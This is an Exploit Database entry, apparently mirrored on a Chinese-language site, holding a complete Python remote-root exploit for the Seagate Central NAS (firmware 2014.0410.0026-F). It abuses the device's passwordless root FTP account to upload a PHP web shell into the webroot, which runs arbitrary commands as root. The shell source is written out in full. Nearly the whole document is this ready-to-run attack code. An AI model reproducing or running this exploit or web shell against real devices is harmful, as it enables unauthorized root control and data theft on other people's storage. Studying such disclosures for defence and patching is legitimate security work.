Seagate Central 2014.0410.0026-F – Remote Command Execution

• Exploit Database
• 17 阅读

• 作者： Jeremy Brown
  日期： 2015-06-03
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/37184/

• #!/usr/bin/python
  # seagate_ftp_remote_root.py
  #
  # Seagate Central Remote Root Exploit
  #
  # Jeremy Brown [jbrown3264/gmail]
  # May 2015
  #
  # -Synopsis-
  #
  # Seagate Central by default has a passwordless root account (and no option to change it).
  # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
  # From there, we can execute commands with root privileges as lighttpd is also running as root.
  #
  # -Fixes-
  #
  # Seagate scheduled it's updates to go live on April 28th, 2015.
  #
  # Tested Firmware Version: 2014.0410.0026-F
  #
  
  import sys
  from ftplib import FTP
  
  port = 21
  
  php_shell = """
  <?php
  if(isset($_REQUEST['cmd']))
  {
  $cmd = ($_REQUEST["cmd"]);
  echo "<pre>$cmd</pre>";
  system($cmd);
  }
  ?>
  """
  
  php_shell_filename = "shell.php"
  seagate_central_webroot = "/cirrus/"
  
  def main():
  if(len(sys.argv) < 2):
  print("Usage: %s <host>" % sys.argv[0])
  return
  
  host = sys.argv[1]
  
  try:
  with open(php_shell_filename, 'w') as file:
  file.write(php_shell)
  
  except Exception as error:
  print("Error: %s" % error);
  return
  
  try:
  ftp = FTP(host)
  ftp.login("root")
  ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
  ftp.close()
  
  except Exception as error:
  print("Error: %s" % error);
  return
  
  print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
  
  return
  
  if __name__ == "__main__":
  main()